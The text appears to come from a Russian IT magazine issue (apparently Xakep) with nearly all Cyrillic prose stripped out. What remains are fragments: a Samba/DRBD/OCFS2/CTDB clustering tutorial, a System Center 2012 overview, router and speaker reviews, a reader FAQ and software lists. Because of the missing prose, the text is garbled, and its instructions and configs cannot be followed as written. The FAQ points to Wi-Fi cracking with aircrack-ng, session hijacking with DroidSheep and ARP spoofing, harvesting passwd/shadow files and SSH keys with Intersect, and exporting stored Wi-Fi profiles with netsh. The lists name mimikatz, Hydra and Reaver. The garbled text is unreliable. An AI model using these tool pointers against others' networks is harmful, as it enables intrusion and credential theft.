staging.

,
,
, . z


SYN/ACK
SYN/ACK

(zobnin@gmail.com)



SAMBA



.

, NAS,


,
.


, CTDB

,
, GNU/Linux Samba.
, :
.

Samba
, ,
Linux Samba,

. ,
.
, RAID1-,
,
. , , ,
.
.
, -
,
c DRBD . :
Samba, ,
.
UNIX CIFS
Samba
, TDB,
Windows SID Unix UID/GID,
, .
Samba ,
TDB, .
, CTDB (Cluster TDB),
Samba
. CTDB

, .



Samba .
1. ,
.
2. RAID1 .
3. RAID1-.
4. Samba.
5. CTDB
Samba.
,
.


, ,
. /dev/sda
( Debian), /dev/sdb
Samba. ,
.

RAID1. DRBD -,
.
,
,
.
, , 10.0.0.1 10.0.0.2
IP-, -, 192.168.0.1 192.168.0.2
,
(
, ).
IP-
:
# apt-get install drbd8-utils

/etc/drbd.conf
:
# vi /etc/drbd.conf
global { usage-count no; }
common { syncer { rate 100M; } }
resource r0 {
    protocol C;
    startup {
        wfc-timeout 15;
        degr-wfc-timeout 60;
    }
    net {
        # (primary/primary)
        allow-two-primaries;
        after-sb-0pri discard-zero-changes;
        after-sb-1pri consensus;
        after-sb-2pri disconnect;
        #
        shared-secret "";
        cram-hmac-alg sha1;
    }
    #
    on node1 {
        device /dev/drbd0;
        disk /dev/sdb;
        address 10.0.0.1:7788;
        meta-disk internal;
    }
    #
    on node2 {
        device /dev/drbd0;
        disk /dev/sdb;
        address 10.0.0.2:7788;
        meta-disk internal;
    }
}

,
, ,
. ,
.
disk ,
, address IP-
DRBD. .
,
:
# drbdadm create-md r0

drbd ( ):
# /etc/init.d/drbd start

,
, DRBD :
# drbdsetup /dev/drbd0 primary -o

,
, /proc/drbd:
# cat /proc/drbd


. ,

.
( ),
OCFS2 Oracle ( , GFS2).
OCFS2 , , ,
:
# apt-get install ocfs2-tools

/etc/ocfs2/cluster.conf.

:

( /samba
Samba):
# mkdir /samba
# echo "/dev/drbd0 /samba ocfs2 noatime 0 0" >> /etc/fstab
# mount /dev/drbd0

. ,
.
.

SAMBA
# vi /etc/ocfs2/cluster.conf
cluster:
	node_count = 2
	name = ocfs2
node:
	ip_port = 7777
	ip_address = 192.168.0.1
	number = 1
	name = node1.cluster.local
	cluster = ocfs2
node:
	ip_port = 7777
	ip_address = 192.168.0.2
	number = 2
	name = node2.cluster.local
	cluster = ocfs2

ocfs2 :
node1.cluster.local node2.cluster.local.
, IP- /etc/hosts .
,
ocfs2
, . ,
IP-.
o2cb:
# /etc/init.d/o2cb start

DRBD-.
:

,
Samba. ,
, CTDB, Samba,
.
, Samba :
[global]
    clustering = yes
    idmap backend = tdb2
    private dir = /samba/ctdb
    fileid:mapping = fsid
    vfs objects = fileid
[public]
    comment = public share
    path = /samba/public
    public = yes
    writeable = yes
    only guest = yes

/etc/samba/smb.conf , /samba/ctdb CTDB. ,


,
OCFS2 .
, , :
# mkdir /samba/ctdb
# mkdir /samba/public
# chmod 777 /samba/public

# mkfs.ocfs2 -L "ocfs2" /dev/drbd0

# smbpasswd -a root

CTDB-



.
CTDB :
# apt-get install ctdb

, ,
,
. Fedora/RedHat /etc/sysconfig/ctdb, Debian/Ubuntu /etc/default/ctdb. :
# lock-
CTDB_RECOVERY_LOCK="/samba/ctdb/lock"
# ,
#
CTDB_PUBLIC_INTERFACE=eth0
# ,
CTDB_PUBLIC_ADDRESSES=/etc/ctdb/public_addresses
# Samba CTDB
CTDB_MANAGES_SAMBA=yes
# CTDB-
CTDB_NODES=/etc/ctdb/nodes
#
CTDB_LOGFILE=/var/log/log.ctdb

/etc/ctdb/nodes IP Samba, :
192.168.0.1/24
192.168.0.2/24

/etc/ctdb/public_addresses
IP-:

, .
IP-, .
.
, CTDB
IP- , ,
.
. CTDB
:
# /etc/init.d/ctdb start

, ctdb status
- :

OK (THIS NODE)


,



CTDB:
# ctdb ping -n all
response from 0 time=0.000064 sec
response from 1 time=0.000087 sec

(3 clients)
(9 clients)

Samba:
# /etc/init.d/samba start

, .
Windows- ,
. UNIX . ,
IP-, /etc/ctdb/public_addresses:
# mount -t cifs //192.168.0.3/public \
/mnt/samba -o user=
# smbclient //192.168.0.4/public

, , ,
, .

192.168.0.3/24
192.168.0.4/24

Number of nodes:2
pnn:0 192.168.0.1 OK (THIS NODE)
pnn:1 192.168.0.2 OK
Generation:1362679229
Size:2
hash:0 lmaster:0
hash:1 lmaster:1
Recovery mode:NORMAL (0)
Recovery master:0

, .
,
, , ,
. ?
, .
?
DRBD-, master/master
. , .
, ,
OCFS2.
(fencing),

,
. (, , ).
CTDB, .
, ,
.
UNHEALTHY DISCONNECTED, IP-
TCP- . ,
, .
CIFS ,
. ?


INFO



,

lustre
GlusterFS.

WARNING
Samba

,
.

DRBD

- . -
-
( , UPS ), .
. ,
.

:
# drbdadm create-md r0
# drbdadm attach r0

,
CTDB:
# mount /dev/drbd0
# /etc/init.d/ctdb restart
# /etc/init.d/samba restart


, , , monit.
][ ,
. ,
CTDB /etc/ctdb/notify.sh,
,
, CTDB-.
, , :
# vi /etc/ctdb/notify.sh
#!/bin/sh
# CTDB passes the event name as the first argument
event="$1"
shift
case "$event" in
    unhealthy)
        mail foo@bar -s "`hostname` is UNHEALTHY" ...
        ;;
    healthy)
        mail foo@bar -s "`hostname` is HEALTHY" ...
        ;;
esac

CTDB ctdb status.


, :
OK ;
DISCONNECTED ;
DISABLED , ;
UNHEALTHY ,
, CTDB ;
BANNED - ,
CTDB;
STOPPED , ;
PARTIALLYONLINE ,
.
Recovery mode, . :
NORMAL .
RECOVERY ,
.

ctdb disable ctdb enable.


. ,
, .

SYN/ACK

IT-
MICROSOFT:

2012

(grinder@synack.ru)

Microsoft
.

System Center,
.
, RC ,
RTM,
.

SCCM 2012 Central Administration Site

SYSTEM CENTER CONFIGURATION MANAGER 2012


, , ,
System Configuration. : Configuration Manager, Operations Manager, Service
Manager, Data Protection Manager (DPM), Virtual Machine Manager
(VMM), Orchestrator Endpoint Protection
( Forefront EP) AppController.
SCCM 2012 ( v.Next),
-
, , ,
. .
SCCM 2012 , 64- , Win2k8/R2
MSSQL2k8SP1 (x64) . (DP,
Distribution Point) - 86 Win. , SCCM
. SCCM 2007 SCCM 2012 (Migration Migration Jobs),
, . ,
, ,
, . ,
, ,
. ,
, ,
, ,
,
. ,
, .
SCCM2012 USMT (User State Migration Toolkit).
OSD (Operating System Deployment)
SCCM,
( )
, WIM. PXE
DP. Intel vPro/AMT
, .
, - Primary Site,

. Central Administration
Site (CAS, Central Primary Site),
.


SCCM 2012


(AI, Software Update Point, RSP SHV). ,
CAS (Primary) ,
Primary.
Secondary Site SQL- ( Express). Native Mixed ,
HTTP / HTTPS, ,
Distribution Point.
. Management
Point . , ,
Primary ,
, . Reporting
Point Reporting Services Point SQL
Reporting Services,
. Branch DP , SCCM 2012
BranchCache. SCCM 2012 , UCM (User Centric Management), ,

(, ).
, , .
,
,
. ,

. ,
, ,
, ,
. ,
.
(Required Available),
(, , App-V, Windows Mobile
CAB), . Available -


INTEL VPRO/AMT
,


SCCM 2012

Software Center,
. ,
( ,
), -. ,
, .
Monitoring, Status Message
Viewer, SCCM2007. Client Custom
Settings ,
.
,
.
Role-Based
Access Control (RBAC), , . Security Roles 13
, , - . ,
, , Security
Scope, , . SCCM
2012 MS Office, Wunderbar, , MMC. ,
,
. ,
Client Health
(ccmeval.exe),
.
SCCM 2012 SC AppController, Concero (. ),
SaaS , Windows Server, Hyper-V Virtual Machine Manager 2012,
Windows Azure. VM, ,
Windows Azure, VHD-.

SYSTEM CENTER OPERATIONS MANAGER 2012


OpsMgr
,

AVICode. , , ,
VLAN ( ).
SNMPv3, IPv4/IPv6, , HSRP .
OpsMgr , Root Management Server , Management Server.
OpsMgr 2012


SCCM 2012 *nix-

.
RMS Emulator. ,
,
Health Service
(Resource Pool) Management Server. ,
.
Failover Cluster Failover Cluster.
: AD Assignment Resource Pool,
Notifications Resource Pool All Management Servers Resource Pool,
.
( Root MS
) .
, - , . Windows, OpsMgr 2012 Linux *nix.
(Management Pack)
: Apache Tomcat, IBM WebSphere, Java EE, Oracle
WebLogic, Red Hat JBoss . , .NET J2EE Windows Azure.
PowerShell ( SCOM/
SC) *nix-.
, :
PS> Get-Command -Module OperationsManager

UNIX/Linux Shell Command Template


, , ,
OpsMgr.
OpsMgr 2007
. , RC
.

MICROSOFT DEPLOYMENT TOOLKIT 2012


MDT SCCM 2012
AD, DaRT (Diagnostic and Repair Toolkit,
Desktop Optimization Pack).
MDT2012 SCCM
2012 ( SCCM2007)
(, ). , MDT ,
.
Task Sequences: Deploy to VHD Client Task Sequence Deploy to VHD


INFO

SCCM2007 ][
08.09/09.09/01.10.

SCOM
2007 ][
08.11.

FEP
2007 ]
[ 09.11.

MDT 2010 ][
10.09.

WWW
SCCM
2012: clck.ru/eN3T.
MDT 2012:
microsoft.com/mdt.

SC Endpoint Protection 2012

Server Task Sequence ( VDI, ).


, MDT 2010
P2V , Sysinternals Disk2vhd ( TechNet
clck.ru/fQOp),
. ,
. ,
MDT 2012 Win8.
MDT_FOLDER/Scripts/UDIWizard_Config.xml UDI Designer (User-Driven Installation,
MDT 2010 Update 1) .
: New Computer,
Refresh Replace.
. , (
TechNet ).
Lite Touch, ,
WinRE. PowerShell.
WinXP Win2k3 .

MS SQL SERVER 2012 (DENALI)


, SQL Server 2012, .


,
. , .
, CTP- 100 000 , .
, .
Win2k8R2
Server Core: SQL- .
: Upgrade Advisor, Distributed Replay Migration Assistant
(SSMA). (Availability
Groups) HADR (High-Availability and Disaster Recovery)
SQL Server
.
, , ,
.
(SQL
Server Multi-Subnet Clustering).
Data Quality Services.

. Power View (Crescent) -


AppController


BISM
(Business Intelligence Semantic Model).
- BISM UDM
PowerPivot.
: IFilter, NEAR, .

, SHA2 256/512. SQL
Express LocalDB , .

, AppController
, : SCVMM, SSP (Virtual Machine Manager Self-Service Portal
Solution Accelerator), DDTK (Dynamic Datacenter Toolkit)
Azure Platform. AppController

, , , . ,
, - .
-,
( ) .

APPCONTROLLER 2012
AppController 2012 System
Center, ( ),
. Azure.

, , .
.

SYSTEM CENTER 2012


System Center 2012 ( clck.ru/ePUN),

private cloud.

. ,
, .
.
2 CPU.
: System Center 2012 Standard Datacenter, .


(
), .

SQL Server, -
.
,
, .
- ,
System Center Client
ML Suite, Service Manager, Operations
Manager, Data Protection Manager Orchestrator.


FERRUM

,

.
,
. . ,
, !


.
. , . Windows, Microsoft Windows Server 2008 R2 Standard,
Microsoft Windows 7 Ultimate x64.
Ixia,
(endpoints, , )
Ixchariot. Ixchariot ,


throughput, .
.
:
1) PPTP. Microsoft
Windows Server 2008 R2 Standard PPTP-,

WAN-. LAN- .
2) NAT.
, Static IP.
3) Wi-Fi. LAN-
, . , , . WPA2-PSK AES.
,
WiFi-: ASUS USB-N53, D-Link DWA-160, TP-Link TL-WN821N ZyXEL NWD2205 EE.
ASUS USB-N53.


ASUS RT-N66U
, , , ASUS RT-N66U. ,
. ASUS ASUS RT-N56U
,
,
, ,
. , ASUS RT-N56U .
ASUS RT-N66U ,
.
USB,
. ASUS RT-N66U
: ,
PPTP.
,
, 100 /, ASUS RT-N66U
. , Dual Access,
.


D-LINK DSR-500N

D-Link DSR-500N

.
, WAN-
. D-Link DSR-500N
USB- Wi-Fi (
),
. , ,
,
, ,
.
D-Link DSR-500N
D-Link.
, Wi-Fi.
, ,
, D-Link
DSR-500N.
, . , D-Link ,
. ,
PPTP Wi-Fi
.

8000
.

NETGEAR WNDR4000
, , ,
? , NETGEAR WNDR4000. ,
. , , NETGEAR
.
.
PPTP NAT. . NETGEAR
WNDR4000 USB-, . ,
.

:
Wi-Fi:
:
:
:
:
:


ASUS RT-N66U

1x WAN (RJ-45) 10/100/1000 /, 4x


LAN (RJ-45) 10/100/1000 /
IEEE 802.11n
2.4 , 5
WEP, WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP, AES)
NAT, DynDNS, Static Routing, DHCP, QoS
PPPoE, PPTP, L2TP, Static/Dynamic IP
EZSetup, WPS, - UPnP,
AiDisk, 2x USB

6000
.

D-Link DSR-500N

2x WAN (RJ-45) 10/100/1000 /, 4x LAN


(RJ-45) 10/100/1000 /
IEEE 802.11n
2.4
WEP, WPA/WPA-PSK, WPA2/WPA2-PSK (TKIP,
AES)
NAT, DynDNS, Static Routing, DHCP, QoS
PPPoE, PPTP, L2TP, Static/Dynamic IP
WPS, 1x USB, ,
Green

NETGEAR
WNDR4000

1x WAN (RJ-45) 10/100/1000 /, 4x LAN


(RJ-45) 10/100/1000 /
IEEE 802.11 a/b/g/n
2.4 , 5
WEP, WPA/WPA-PSK, WPA2/WPA2-PSK (TKIP,
AES)
NAT, DynDNS, IPTV, Static Routing, DHCP, QoS
PPPoE, PPTP, L2TP, Static/Dynamic IP
: WPS, , 1x USB


ZYXEL KEENETIC GIGA


ZyXEL , ,
Dial-Up. .
ZyXEL Keenetic Giga.
Keenetic
USB , , . -
, 3G/4G- Wi-Fi. Keenetic Giga
.
, 99.9%,
- , -, IPTV-.
- . ,
, .
, . ,
NAT , PPTP .
.

3300
.

TP-LINK TL-WR1043ND
,
. TP-Link TL-WR1043ND
,
USB-. . , :

?
, TP-Link TL-WR1043ND , ,
. ,
(,
USB-),
. ,
,
.
.

2000
.

TP-Link TL-WR1043ND

1x WAN (RJ-45) 10/100/1000 /,


4x LAN (RJ-45) 10/100/1000 /
IEEE 802.11a/b/g/n
2.4
WEP, WPA/WPA-PSK, WPA2/WPA2-PSK (TKIP, AES)
NAT, DynDNS, Static Routing, DHCP,
QoS
PPPoE, PPTP, L2TP, Static/Dynamic IP
: WPS, 1x USB


ZyXEL Keenetic
Giga

1x WAN (RJ-45) 10/100/1000 /,


4x LAN (RJ-45) 10/100/1000 /
IEEE 802.11n
2.4
WEP, WPA/WPA-PSK, WPA2/WPA2-PSK (TKIP, AES)
NAT, DynDNS, Static Routing, DHCP,
QoS
PPPoE, PPTP, L2TP, Static/Dynamic IP
WPS, TVport, 2x USB

, ,
. ASUS RT-N66U,

,
. ASUS RT-N66U
.
ZyXEL
Keenetic GIGA . NETGEAR WNDR4000 ,
. TP-Link ,
.

[Charts: Wi-Fi (two panels), PPTP and NAT test results, series FDX, Downstream and Upstream, for ASUS RT-N66U, D-Link DSR-500N, NETGEAR WNDR4000, TP-Link TL-WR1043ND and ZyXEL Keenetic GIGA]

EDIFIER
MP15 PLUS

:
: 1.22

: 100-20000
:
: 40
: 6
:
450
: 10
:
, /
,
,
: 3.5
,
SD-, FM-
: 2006033
: 0.2


: ,
, .
- ,
, . .
, - . -
, ,
. , Hi-End
, ?
Edifier.
Edifier MP15 Plus Edifier Audio Candy Plus .
, .
. ,
, .
, USB.
FM- SD- .
,
. ,
,
. , ,
. -

1200
.

,
.

, EdifierMP15 Plus .
, 200 .

.
EdifierMP15 Plus ,
. , , .

. ,
. , lossless- ,
MP3. Toshiba Satellite L635-12Q iPod nano 5G.


, Edifier MP15
Plus
. ? ,
, .
-,
.
, Edifier MP15 Plus
.


UNITS / FAQ UNITED

FAQ United

FAQ@REAL.XAKEP.RU
Windows 8 Consumer
Preview, Microsoft

. ,
.
,
Microsoft,
Metro-?


A ViStart (lee-soft.com/vistart),

Windows XP,
Vista/
Windows 7.
. ,

,
,
.
: bit.ly/w7gsxv.
, Windows 8
Q Metro, ?

1. .
C:\Users\<User Profile>\
AppData\Roaming\Microsoft\Windows\
Start Menu\Programs\Startup , explorer.exe shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}.
2. .
Win-R
taskschd.msc. , Create task.
,
,
(Triggers New), Begin the task: At
log on
(Delay task for: 5 seconds). (Action:
Start a program)
explorer.exe shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}.

Jabber-.
,
. -
,
?


XMPP-,
, , Python. Twisted Words

(twistedmatrix.com/trac/wiki/TwistedWords),
Wokkel (wokkel.ik.nu), SleekXMPP (code.google.com/p/sleekxmpp) , ,
, .

IMified (imified.com),
HTTP
API.

?
Windows.


,
. , WiFi HotSpot Creator
(wifihotspotcreator.com) .
SSID, WPA2

,
.


,
. ?

A:

Jabber. -,

JS- ?

,
, .
, , Android iOS
Firebug
( Firefox) Web Inspector (
WebKit-), JS-.


-
DOM- , , ,
(
, ) . ,
, ,
.
.
,
Adobe.

weinre
(phonegap.github.com/weinre), FireBug Web
Inspector,

, ,
.
,
, , , . Android, iOS, BlackBerry, webOS.



SSL- (
GTalk ,
HTTPS).
-,
OTR (Off-the-Record).
. :

;
, ;

,
;

,
- .



SPDY,
GOOGLE,
?
SPDY ( )

, Google
HTTP.
, ( )
.
Google
Chrome Firefox,
HTTP-
Google (, Gmail),
Twitter.
90- HTTP
-,
.
TCP-,

,

, .

OTR (
) Adium, Pidgin, Kopete,
Miranda IM, Trillian, qutIM, Psi+ .
JavaScript HTML- , ,
( -,
)?

, JavaScript-,
,
(
) ,
. .
, JS-
, Malzilla (malzilla.sourceforge.net).
,
() .

Adobe
Adobe Lab Adobe Shadow (labs.adobe.com/technologies/shadow).

( Chrome)
( pairing).

, , .


SPDY
50%
(
TCP).
HTTP- ,
,
( ,
User-Agent),


, .
Google (chromium.org/spdy/spdy-whitepaper), ,
SPDY.
-,
SPDY.
Apache (code.google.com/p/mod-spdy),
Python (github.com/mnot/nbhttp/tree/spdy). Chrome, ,
(bit.ly/xldeGj),
,
HTTP
SPDY.

Chrome ( , : chrome://net-internals) SPDY.

JavaScript-
(jsconsole.com) ,

.
.
.
(jsconsole.com/remote-debugging.html) , .

JavaScript
RemoteJS (bit.ly/wF63OE).
:
GUI-, Python . ,
Android.
Sencha ,
HTML5.






(, aircrack-ng) Android?

A xda-developers.com,

,
,
Android
airodump aircrack-ng (, bit.ly/znrtiB). , -,
, -,
.

, DroidSheep
(droidsheep.de) Shark for Root (bit.ly/wpexhA). , , ARP
Spoofing (, ).
PCAP-,
, ,
Wireshark.

,
?

VMware :
snapshot,
,
.vmem
. VirtualBox
.

1.
:
VirtualBox --dbg --startvm <VM name>

2. Debug
Command line....
3.
.pgmphystofile <filename>, ,
dump.
Volatility (code.google.com/p/volatility).
Passware
(lostpassword.com/kit-forensic.htm),
.
,

. -
,
?

,
.

, .
, ASUS WL-500gP
,
(wl500g.info). , ,
OpenWRT (
telnet)

firmware (
, reset settings
,
192.168.1.1
ftp). ,

nvram. ,
, nvram
show. , , .

:
Linux, .


Linux- ,
.
, ,
.
Intersect, Python. , ,
.
(passwd,
shadow, gshadow, master.passwd),
SSH- ( ),
,
Bash ,

,
.
.


,
Windows-?


WirelessKeyView
(nirsoft.net/utils/wireless_key.html),
. . Windows
Wireless Zero Configuration (,
)
.
, :

netsh wlan show profiles

,
:
netsh wlan export profile name="<
>"

XML-,

,
(, ).
? -,


!
netsh wlan add profile filename="<
.xml"

Weinre FireBug Web Inspector,


.

,
, . , ,
! ,
:).


>Net
AutoPuTTY 0.24.2
Awasu 3.0
Cookienator 2.6.41
CrossLoop 2.82
Fiddler 2.3.9.3
Lanshark 0.0.2
Lunascape 6.6.0
mRemote 1.50
NetWorx 5.2.2
Omea Reader 2.2
Psi 0.14

>Multimedia
1by1 1.75
Audacity 1.3.14
AutoBrake 1.07
CamSpace 8.95
Capture2Text 1.10
Format Factory 2.90
Free Audio Editor 2012
mpTrim 2.13
music2pc 2.12
Picasa 3.9
SkypeAutoRecorder
Songr 1.9.33
TagScanner 5.1.610
Tunatic 1.0.1b
VideoInspector 2.3.0.126
VLC 2.0

>Misc
Aard Dictionary 0.9.3
AllDup 3.4.0
DisplayFusion 3.4.1
Evernote 4.5.3.6131
Everything 1.2.1.371
FilePro 1.0
HoeKey 1.13
HotKey Resolution Changer 1.5
LastPass 1.90
Process Blocker 0.7b
PyCmd 0.8
RegScanner 1.85
StExBar 1.8.3
Synergy 1.3.8
timeEdition 1.1.6
Workrave 1.9.4

>>WINDOWS
>Development
Dependency Walker 2.2
DJ Java Decompiler 3.12.12.96
Free JavaScript Editor 4.7
Frhed 1.6.0
HxD 1.7.7.0
KompoZer 0.8b3
Microsoft Visual Studio 11 Beta
NSIS 2.46
PHP 5.4.0
py2exe 0.6.9
RapidSVN 0.12
RubyMine 4.0
SWI-Prolog 6.0.1
TextPad 5.4.2
TortoiseSVN 1.7.5
Xdebug 2.1.3

>>UNIX
>Desktop
Bib2xhtml 3.0
Blender 2.62
Brl-cad 7.20.4
Ccextractor 0.60
Cdcat 1.8
Cdemu 1.5.0
Cinnamon 1.2
Libreoffice 3.5.0.3
Libvpx 1.0.0
Macrofusion 0.7.3
Mapsurfing
Mathomatic 15.8.0
Openshot 1.4.2
Pinta 1.1
Spacefm 0.7.0
Vlc 2.0.0
Windowmaker 0.95.2
Zile 2.4.6

>System
ClipboardZanager 1.0
CPU-M Benchmark 1.0
DHE Drive Info 3.2.493
Disk Bench 2.6.2.0
Disk Investigator 1.31
DriverIdentifier 3.9
DSynchronize 2.30.2
File Extension Monitor 1.4
MouseWrangler 1.0.2
NTFS Permissions Reporter 1.0.0
Process Explorer 15.13
Simple Data Backup 7.0
Startup Master
System Ninja 2.3.1.0
USB Oblivion 1.7.0.0
Windows Surface Scanner 2.20

>Security
AJAX Crawling Tool
BFT - Browser forensic tool
Browser Forensic Tool
Browzar 2.0
codesensor
CodeSensor 0.1
DPScan
FuzzOps-NG
Fuzzware 1.5
Heimdal
IronWASP
MagicTree 1.1
mimikatz 1.0
Nessus 5.0
PEBrowse Professional 10.1.4
SIPVicious 0.2.7
uniofuzz
Uniofuzz 0.1.2
untidy
untidy beta 2

Spiffy 0.5.11
The Dude 3.6
TightVNC 2.0.4
UltraSurf 11.04
Wuala

>Security
Afick 2.20
AlienVault
Bluelog 1.0.2
codesensor
DotDotPwn 3.0
DPScan
FuzzOps-NG
Fwknop 2.0
Gnupg 2.0.18
Heimdal
Nessus 5.0
Netifera 1.0
Reaver 1.4
Samhain 3.0.2
sipvicious 0.2.7
THC-HYDRA v7.2
Tor 0.2.2.35
Trupax 6
uniofuzz
untidy
Vpnd 1.1.4
WeBaCoo 0.2.2
zzuf 0.13

>Net
Ajaxplorer 4.0.3
Bitlbee 3.0.5
Chrome 17.0.963
Dxirc 1.00.0
Gfeedline 1.0
Gnubiff 2.2.14
Leechraft 0.5.0
Liferea 1.8.0
Nat-traverse 0.5
Pcapsipdump 0.2
Qtm 1.3.7
Rdp-runner 0.1.17
Sflphone 1.0.2
Spgt 0.7.1
Tomuss 3.1.7
Uhub 0.3.2
W3perl 3.141
Yate 4.0.0

>Devel
Anjuta 3.2.2
Execline 1.1.3
Highlight 3.7
Kotlin 0.1.429
Lgi 3.4.0
Libpki 0.6.7
Libpng 1.5.9
Lrc 0.7
Lua 5.2.0
Mahout 0.6
Mono 2.10.8
Netty 3.3.1
Opentbs 1.7.5
Panda3d 1.8.0
Parrot 4.0.0
Rails 3.2
Sabredav 1.5.7
Ujorm 1.22
Wro4j 1.4.4

>>MAC
Cathode 1.2.0
Docker 1.6.7
Gruml 1.1
HyperDock 1.2
iZip Archiver 1.4
KeyRemap4MacBook 7.5.0
Mouse Server 2.6.9
Notify 2.1
Prey 0.5.3
Private Eye 1.0
Que 1.3.1
RCDefaultApp 2.1
Resuminator 1.0
Syrinx 2.5.0
Tunatic 1.1
VLC 2.0
WhatRoute 1.10.7

>X-distr
CentOS 5.8

>System
Alsa 1.0.25
Bcfg2 1.2.1
Clonezilla 1.2.12-10
Fuse-exfat 0.9.6
Kccmp 0.3
Limitcpu 1.5
Mesa 8.0
Mondorescue 3.0.0
Nvidia 295.20
Pf-kernel 3.2.5
Procmeter3 3.6
Quotatool 1.4.12
Rally 0.5.5
Spacewalk 1.6
Wayland 0.85.0

>Server
Apache 2.2.22
Asterisk 10.1.3
Bind 9.8.1-p1
Cups 1.5.2
Dhcp 4.2.3-p2
Dovecot 2.1.1
Freeradius 2.1.12
Lighttpd 1.4.30
Mysql 5.5.21
Nsd 3.2.10
Openldap 2.4.29
Openvpn 2.2.2
Postfix 2.9.1
Postgresql 9.1.2
Pure-ftpd 1.0.35
Samba 3.6.3
Sendmail 8.14.5
Snort 2.9.2.1
Sqlite 3.7.10
Squid 3.1.19
Syslog-ng 3.3.4
Vsftpd 2.3.5


UNITS / WWW2

WWW2
VOX.IO
vox.io
, Skype', , . Vox.io
-
, . vox.
io- , , ,
. ,
, iOS.
Skype

XMARKS
xmarks.com
:
? Xmarks (Firefox, Chrome, Internet Explorer Safari),
. (12$ ),
. , :
,
LastPass.

LOADS.IN
loads.in

-, . , .
, . loads.in .

: Firefox, Chrome, Safari, Internet Explorer.
,
- .

DIAGRAMLY
Diagram.ly
- ,
Microsoft Visio. . ,
, - . Diagramly must have ,
,
. -, , ,
Diagramly 70 .
